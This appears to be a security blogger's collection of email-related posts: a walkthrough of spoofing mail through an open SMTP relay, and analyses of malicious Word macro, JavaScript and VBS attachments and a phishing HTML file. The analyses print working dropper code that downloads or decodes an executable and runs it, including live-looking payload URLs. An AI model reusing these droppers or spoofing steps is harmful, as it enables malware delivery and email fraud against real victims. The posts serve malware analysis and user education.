neonprimetime security , just trying to help: Email

Showing posts with label Email. Show all posts

Friday, September 16, 2016

Sending SMTP Emails

This kali tutorial on SMTP hacking give a simple walk-through

If you find a vulnerable SMTP server that does not require authentication you can telnet or netcat to it on port 25.

First greet the server with HELO thedomain.com

Next start a message with the sender MAIL FROM: sendingvictim@thedomain.com

And set the recipient RCPT TO: spamvictim@somewhere.com

And start the body by typing DATA

Enter the subject with SUBJECT: my subject

Then type in the body of the email you want

Then type . and hit <ENTER> to send the email

Then get out of there with QUIT

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, June 7, 2016

Understanding VBA from an Invoice Email

This malicious email contained a microsoft word attachment with VB code in it. Here is a link to the full original macro code.

SUBJECT: RECONFIRM INVOICE
ATTACHMENT: RECONFIRM INVOICE.doc

The code was interesting because it seemed amateurish in terms of it's obfuscation. Sure there were tons of random looking letters, variable names, etc. But in general, this was poorly obfuscated, if at all. Here are a few examples:

Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask

The above variable was used for doing bitwise masking of a string value, yet the attacker literally named it "HighMask" so you know exactly what it's used for.

Public Function Encode64(sString As String) As String

The above function literally performs base64 encoding of a string, so the name Encode64 makes sense and makes life simpler for the security researcher.

Public Sub Wipedir(pppppppppppppppppppppppppp As String)

The above function Wipredir calls the VBA deletefolder method in it, so again it's clearly deleting the evidence afterwards, thus the obfuscation here is poor.

So de-obfuscating this was quite simple then. One of the easier ways to quickly de-obfuscate VBA code like this is to put it into a word document, comment out the malicious lines, replace them with MsgBox statements, and execute the code, let the code do the work for you. For example:

Comment out this code with a tick

'MkDir (decryptString(Encode64(b)))

And replace it with this code

MsgBox ("MkDir=" + decryptString(Encode64(b)))

Comment out this code with a tick

'ChDrive (vEnd988888527)

And replace it with this code

MsgBox ("ChDrive=" + vEnd988888527)

Comment out this code with a tick

'Open vEnd3491963883 For Binary As vEnd1400215006

And replace it with this code

MsgBox ("OpenFile=" + vEnd3491963883)

Comment out this code with a tick

' OBsGG = Shell(vbHH, 1)

And replace it with this code

MsgBox ("Shell=" + vbHH)

Comment out this code with a tick

'OOO.deletefolder pppppppppppppppppppppppppp

And replace it with this code

MsgBox ("deletefolder=" + pppppppppppppppppppppppppp)

And like magic, you'll get a bunch of message boxes that tell you exactly what this code is trying to do. In this case
1.) Create a new folder C:\ProgramData\Memsys
2.) Navigate to that folder C:\ProgramData\Memsys
3.) Open and Write to a file C:\ProgramData\Memsys\ms.exe
4.) Execute that file from the command prompt C:\ProgramData\Memsys\ms.exe
5.) Delete that folder C:\ProgramData\Memsys

Of course always do this in a sandbox, not connected to the Internet, in case you accidentally execute malicious code that you didn't mean to and infect yourself.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, May 31, 2016

Javascript Attachment executing a Payload

Saw the following malicious email this week. The subject was "Internal Company Information Notice". The body of the email told the user that their IP address had been blocked and they need to acknowledge the email attachment or get disconnected from their services. The attachment was a zip file that contained a Javascript file inside. If the user were to extract the zip and execute the javascript file, a malicious executable would be downloaded and executed on the workstation. The javascript was heavily obfuscated, as you can see from this original javascript code. I reviewed and de-obfuscated the Javascript to get the following. I thought I'd walk through the code to give you an idea of what a lot of these attachments are doing. First, if you look at the link above, the obfuscated code contains tons of variables that are unreabled. As an example, this variable below is obsfucated.

var xDYcEgLL = "061013030014053014007007000013";

When you de-obfuscate it it turns into a string that says "SaveToFile". As it standard with these malicious actors, they have a de-obfuscate function that simply decodes these ugly variables into readable javascript code. So you can simply call the method, in this case the function below

function phdODK(BDxzUxp)

And it will decode all the variables and you can quickly get an idea of what the malicious actor is trying to accomplish.

In this case I de-obfuscated the code and came up with this pseudo code of what the attacker is doing.

var xmlReq = new ActiveXObject("MSXML2.XMLHTTP");
xmlReq["open"]("GET", "http://rondels.com/media/gallery/1.exe", 0);
xmlReq["send"]();
if (xmlReq["Status"] == 200) {
    var fileStream = new ActiveXObject("ADODB.Stream");
    fileStream["Open"]();
    fileStream["Type"] = 1;
    fileStream["Write"](xmlReq["ResponseBody"]);
    fileStream["Position"] = 0;
    var fileObj = new ActiveXObject("Scripting.FileSystemObject");
    fileStream["SaveToFile"](fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"]());
    fileStream["Close"]();
    var cmdPrompt = new ActiveXObject("WScript.Shell");
    cmdPrompt["run"]("cmd.exe /c " + fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"](), 0);
}

I'll go line by line through the javascript.

var xmlReq = new ActiveXObject("MSXML2.XMLHTTP");
xmlReq["open"]("GET", "http://rondels.com/media/gallery/1.exe", 0);
xmlReq["send"]();
if (xmlReq["Status"] == 200)

The attacker needs a way to download their malicious payload (for example their ransomware executable). To do so they utilize the Microsoft ActiveX object for XMLHttpRequests. This means that this attack the way it's currently written is only going to work if the user opens it from a Windows desktop or something that support ActiveX. Then he opens he sends a request to open the malicious url with the executable. The 0 parameter means that it's a synchronous call, so the code will wait for the download to complete before proceeding. Only if the download is successful (response code = 200) will it proceed to the next steps.

var fileStream = new ActiveXObject("ADODB.Stream");
fileStream["Open"]();
fileStream["Type"] = 1;
fileStream["Write"](xmlReq["ResponseBody"]);
fileStream["Position"] = 0;
var fileObj = new ActiveXObject("Scripting.FileSystemObject");
fileStream["SaveToFile"](fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"]());
fileStream["Close"]();

Next the attacker needs a way to interact with the victims workstation, and in particular with the file system on the victim's workstation, meaning typically their C drive. So they open another ActiveX Object (ADO) for Files (called a Stream). This file will then be opened as a binary file (Type = 1) starting at the beginning of the file (Position = 0) and will write the executable downloaded from the malicious URL into that binary file. The file will then get saved to the temporary folder using the GetSpecialFolder method (#2 = temporary folder). The name of the file getting saved it actually randomly generated by the operating system using the GetTempName method out of the Scripting.FileSystemObject object.

var cmdPrompt = new ActiveXObject("WScript.Shell");
cmdPrompt["run"]("cmd.exe /c " + fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"](), 0);

Finally the attacker has successfully connected to a website, downloaded an executable, saved it as a binary file in the victim's temp folder, and now the attacker is going to use a Wscript.Shell object to execute the new binary file on the command line (cmd.exe). One this happens it's game over for the victim as we now have code execution. All because a user did not spot a phishing email with a malicious attachment but instead clicked through. Time to re-image this workstation.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Saturday, November 14, 2015

Malicious VBS Script Walkthrough

This malicious VBS script was attached to a suspicious email. Below I'll walk-through line by line and explain what it's doing.
This is the original code.

data="895C241833C333442334424403344244......4444494e475858504144"
data=split(data,"H")(1)
set ws = CreateObject("WScript.Shell")
fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe"
saveFile fn,data
ws.Run fn
wscript.sleep 100

sub saveFile(fName,str)
  dim temp
  set xmldoc = CreateObject("Microsoft.XMLDOM")
  xmldoc.loadXml ""
  set pic = xmldoc.createElement("pic")
  pic.dataType = "bin.hex"
  pic.nodeTypedValue = str
  temp = pic.nodeTypedValue
  with CreateObject("ADODB.Stream")
    .type = 1
    .open
    .write temp
    .saveToFile fName, 2
    .close:
  end with
end sub

Let's do a line-by-line walk-through of the code above. First...

data="895C241833C333442334424403344244......4444494e475858504144"

There was a large variable that contains a string version of the EXE or malicious payload that the attacker wants to run on your computer.

data=split(data,"H")(1)

But actually the big string variable contains extra junk as well and only part of it is for the malicious executable. The letter "H" mark boundaries in the long string, so it splits it apart and grabs one part of the string.

set ws = CreateObject("WScript.Shell")

Then it's going to create an ActiveX object that will allow the attack to interact with the shell (the command prompt).

fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe"

First thing they do with the command prompt is use it to determine where the windows temp folder path is because no matter who the attacker is they're more than likely going to have write access to the temp directory. Then with that folder path they generate a string that will hold the final destination path where their malicious executable that they're calling 'tmp.exe' is going to get saved and run from.

saveFile fn,data

Then they save the executable stored in that string variable to that temp folder path they just found. NOTE: saveFile is not a system function, it is a custom written one that we will talk about more below.

ws.Run fn
wscript.sleep 100

Then they use the shell object to run the executable they just saved. And they have the script sleep/pause a little bit just to ensure their executable finishes running. NOTE: We didn't discuss today what the executable was doing but let's assume it's installing some sort of backdoor that allows the attacker to control your computer and send/receive data from it at a later date.

Now as we stated above there was one custom function called saveFile that we need to dig a bit deper into.

sub saveFile(fName,str)

The function is called saveFile and it takes 2 parameters, the path to save to (called 'fName') and the data to save to the file (called 'str').

  dim temp
  set xmldoc = CreateObject("Microsoft.XMLDOM")
  xmldoc.loadXml ""

First some variables are create. A 'temp' variable will be used to hold the final modified binary hex version of the executable string passed in to this function and written to disk. The xmldoc will be used as part of transformation process to get that string into the binary hex executable. xmldoc is an ActiveX XMLDOM object (allows reading, writing and modifying of XML files). Initially the attacker just puts an empty xml document (with just the version header) into the variable.

  set pic = xmldoc.createElement("pic")
  pic.dataType = "bin.hex"
  pic.nodeTypedValue = str
  temp = pic.nodeTypedValue

Now the attacker is going to use that empty xml document simply as a pass-thru to transform his string to binary hex. How? He creates inside that empty xmldoc 1 new element called 'pic'. He sets the data type of 'pic' to 'bin.hex' (Binary Hex which is what is needed for an executable). Then he puts the string version of the executable (passed in as 'str') to the xml element. Now when he accesses the 'nodeTypedValue' parameter of the xmldoc, that's where the magic happens and the XMLDOM object automatically converts his string to binary hex. He puts that new Binary Hex value into the 'temp' variable. Almost done.

  with CreateObject("ADODB.Stream")
    .type = 1
    .open
    .write temp
    .saveToFile fName, 2
    .close:
  end with
end sub

Final step for the attacker is to create an ActiveX object ADODB.Stream that allows manipulation of a binary stream of data (which he happens to have saved in 'temp' now). He uses the dot (.) to concatenate a bunch of function calls together. First he sets the type of data (1=binary, 2=text, etc.). Then he opens the binary stream in memory. Then he writes his Binary Hex from 'temp' to the stream in memory. Then he saves the stream from memory to disk at the location specified in 'fName' and passes the save Option (1 = don't overwrite if exists, 2 = overwrite if exists). Then he closes the stream which means memory is flushed out to disk and we're done. Let the evilness begin.

Hope this was helpful.
NOTE: I didn't include the entire data variable's payload, it was long and not necessary for my walk-through.
NOTE2: I re-orged the code below from the original pastebin dump just to make it more readable.
NOTE3: The original script had a bunch of colons (:) which allows VBS scripts to write multiple commands on the same line. I removed them just to make it more readable again.

More about neonprimetime

Top Blogs of all-time

Tuesday, March 31, 2015

Phishing Email Example Walkthrough

I recently posted a phishing email example. I thought it'd be interesting to quickly walk-through what it's doing.

The Subject 'FW: Remittance reconfirmations' tries to draw your attention by looking like a previously forwarded email, and containing talk about payments/remittance.

The Body is actually playing on your friendly side saying 'Kindly Verify the attached remittance and purpose.'

The attachment seems pretty benign in nature as it's named 'Remitance004.html'. But don't be fooled, even '.html' files (as I've blogged about before) can be dangerous.

Top Urgent!
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com

Subject: hello
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

As seen above, the body of the email makes it look like this was forwarded over and over to multiple people, giving it some legitimacy.

But once we look into the attachment ('Remitance004.html') we are able to confirm that it's really just a malicious phish attempt.

<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar"> >

The above code should tip you off as bad, because this line of code says that if you open the html file in a browser, it will not display the contents, but instead automatically redirect you to this '.jar' file which will prompt for downloading. '.jar' files are dangerous. Think of them as executable zip files. They'll probably kick off a storm of activity on your pc that will ultimately end up compromising your system. Don't open '.jar' files unless you know what you're doing.

<span class="btn">  <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span> >

Otherwise, if you open it just in your email client, you will be shown a pretty looking page, and the code above shows that part of that page will contain a button that if you click on it, it'll load the same malicious jar file.

Don't open emails from people you don't know, especially if it's got an attachment.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, November 17, 2014

Phishing Samples November 2014

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.

I dumped some recent samples onto pastebin

You'll see plays on topics like
- target credit card breach
- Facebook
- linked in
- Medicare
- Job postings
- credit reports
- your bank
- UPS shipments
- FedEx shipments
- so many more....

Protecting yourself is simpler than you think. Here are some simple steps I recommend ...
- If you were not expecting the email be extra cautious
- even if you were expecting an email still check the basics below
- hover over the email or click reply and verify the sender is a legit address
- hover over or copy and paste links and verify they are legit
- better yet resist clicking on any link at all, instead manually type the URL you want and go to the site on your own terms
- don't open attachments, legit websites won't send them ... If you are waiting on something , manually go to the website , login, and check there

Also keep in mind the same topics are starting to apply to text messages too. Don't click on links.

What's the worst that could happen? Think ...
- virus on your PC
- virus on your phone
- identify theft
- stolen password
- stolen credit card
- bad bad things ...

Stay safe out there !

Copyright © 2014, this post cannot be reproduced or retransmitted in any form without reference to the original post.